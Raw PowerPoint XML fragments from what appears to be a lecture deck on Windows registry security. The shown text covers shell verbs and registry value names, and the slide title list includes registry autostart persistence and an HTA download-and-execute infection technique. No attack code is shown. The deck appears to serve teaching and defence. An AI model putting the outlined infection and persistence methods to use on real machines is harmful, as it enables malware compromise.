              <a:t>verbs appear on the context menus of files in Windows Explorer, but can also be invoked programmatically. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Registration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>unregistration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> of a shell verb is controlled by its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>component</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and its application's executable:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Shell Verb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Tarma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> Software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="投影片編號版面配置區 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1AE96A04-6FFE-4647-B1EB-FABF2537EC88}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2514056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Value names and data can include the backslash character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="投影片編號版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1AE96A04-6FFE-4647-B1EB-FABF2537EC88}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Value Name and Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2816162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11325</TotalTime>
  <Words>3371</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>370</Paragraphs>
  <Slides>86</Slides>
  <Notes>0</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>佈景主題</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>投影片標題</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>86</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="87" baseType="lpstr">
      <vt:lpstr>波形</vt:lpstr>
      <vt:lpstr>Security of Windows Keys </vt:lpstr>
      <vt:lpstr>Articles of Windows Keys</vt:lpstr>
      <vt:lpstr>Articles of Windows Key Security</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Registry [Microsoft]</vt:lpstr>
      <vt:lpstr>Structure of the Registry [Microsoft]</vt:lpstr>
      <vt:lpstr>Functions of a Key[Microsoft]</vt:lpstr>
      <vt:lpstr>Key Name [Microsoft]</vt:lpstr>
      <vt:lpstr>Value Name and Data [Microsoft] </vt:lpstr>
      <vt:lpstr>Key Value Type [SyeedHasan]</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example [Microsoft] </vt:lpstr>
      <vt:lpstr>Explanation of Previous Slide [Microsoft] </vt:lpstr>
      <vt:lpstr>Explanation of Previous Slide [Microsoft] </vt:lpstr>
      <vt:lpstr>Level of a Registry Tree [Microsoft]</vt:lpstr>
      <vt:lpstr>What is a hive?  [SyeedHasan]</vt:lpstr>
      <vt:lpstr>Example [SyeedHasan]</vt:lpstr>
      <vt:lpstr> [lifewire]</vt:lpstr>
      <vt:lpstr>Windows Environment Variables [ss64]</vt:lpstr>
      <vt:lpstr>Boot Key Value Name [SyeedHasan]</vt:lpstr>
      <vt:lpstr>BootExecute Key Value Name</vt:lpstr>
      <vt:lpstr>User Log-on Key Value Names [SyeedHasan]</vt:lpstr>
      <vt:lpstr>UserInit Key Value Name</vt:lpstr>
      <vt:lpstr>UserInit Key Value Name [SyeedHasan]</vt:lpstr>
      <vt:lpstr>Shell Key Value Name [SyeedHasan] </vt:lpstr>
      <vt:lpstr>Run/RunOnce Keys, ASEPs, and Startup [SyeedHasan] </vt:lpstr>
      <vt:lpstr>Run and RunOnce Keys  [SyeedHasan] </vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>run (autostart) Keys [softwareok.com]</vt:lpstr>
      <vt:lpstr>Example of the First run (autostart)  Key</vt:lpstr>
      <vt:lpstr>Example of the Second run (autostart)  Key</vt:lpstr>
      <vt:lpstr>run (autostart) in the registry on Windows 10, 8.1 [softwareok.com]</vt:lpstr>
      <vt:lpstr>Delete a run (autostart) Key Value in the registry on Windows 10, 8.1 [softwareok.com]</vt:lpstr>
      <vt:lpstr>startup folder [softwareok.com]</vt:lpstr>
      <vt:lpstr>Auto startup programs and APPs in Windows-10 [softwareok.com]</vt:lpstr>
      <vt:lpstr>auto startup folder in Windows 10 current user [softwareok.com]</vt:lpstr>
      <vt:lpstr>Security Issues about the Keys [SyeedHasan]  </vt:lpstr>
      <vt:lpstr>Startup Keys [SyeedHasan] </vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Security Issues about the Keys in Previous Slide [SyeedHasan] </vt:lpstr>
      <vt:lpstr>AppInit_DLLs Key Value [SyeedHasan] </vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>AppInit_DLLs Key Value [SyeedHasan] </vt:lpstr>
      <vt:lpstr>KnownDLLs Key [SyeedHasan]</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>KnownDLLs [SyeedHasan]</vt:lpstr>
      <vt:lpstr>File Type Association [SyeedHasan]</vt:lpstr>
      <vt:lpstr>HKLM\Software\Classes\.txt</vt:lpstr>
      <vt:lpstr>  Example (1)</vt:lpstr>
      <vt:lpstr> Example (2)</vt:lpstr>
      <vt:lpstr> Example (3)</vt:lpstr>
      <vt:lpstr>Infection Using a HTA File [cyber one]</vt:lpstr>
      <vt:lpstr>Write a HTA File to Download and Execute a File from a Remote Site</vt:lpstr>
      <vt:lpstr>Delete a HAT File and Related Window</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Persistence [cyber one]</vt:lpstr>
      <vt:lpstr>Store a Script in a Key</vt:lpstr>
      <vt:lpstr>Retrieve a PowerShell Script from a Key and Execute it</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Object [Microsoft]</vt:lpstr>
      <vt:lpstr>Handle [Microsoft]</vt:lpstr>
      <vt:lpstr>Object Manager[Microsoft] </vt:lpstr>
      <vt:lpstr>Object Header [Microsoft] </vt:lpstr>
      <vt:lpstr>The Tasks That the Object Performs [Microsoft] </vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Shortcut Menus [Microsoft]</vt:lpstr>
      <vt:lpstr>Example [Microsoft]</vt:lpstr>
      <vt:lpstr>Shortcut Menu for a Registered file Type [Microsoft]</vt:lpstr>
      <vt:lpstr>Extend the Shortcut Menu [Microsoft]</vt:lpstr>
      <vt:lpstr>Shortcut Menu Handler [Microsoft]</vt:lpstr>
      <vt:lpstr>Verb [Microsoft]</vt:lpstr>
      <vt:lpstr>Verb Example [Microsoft]</vt:lpstr>
      <vt:lpstr>Verb Display Name [Microsoft]</vt:lpstr>
      <vt:lpstr>Shortcut Menu Handlers[Microsoft]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Register an Application to Handle Arbitrary File Types [Microsoft]</vt:lpstr>
      <vt:lpstr>First Purpose  [Microsoft]</vt:lpstr>
      <vt:lpstr>Second Purpose  [Microsoft]</vt:lpstr>
      <vt:lpstr>Register the Default Procedure  [Microsoft]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Example [Microsoft] </vt:lpstr>
      <vt:lpstr>Example [Microsoft] </vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Shell Verb [Tarma Software]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Fu-Hau H</dc:creator>
  <cp:lastModifiedBy>Fu-Hau H</cp:lastModifiedBy>
  <cp:revision>183</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-02T08:37:33Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-13T11:43:19Z</dcterms:modified>
</cp:coreProperties>
</file>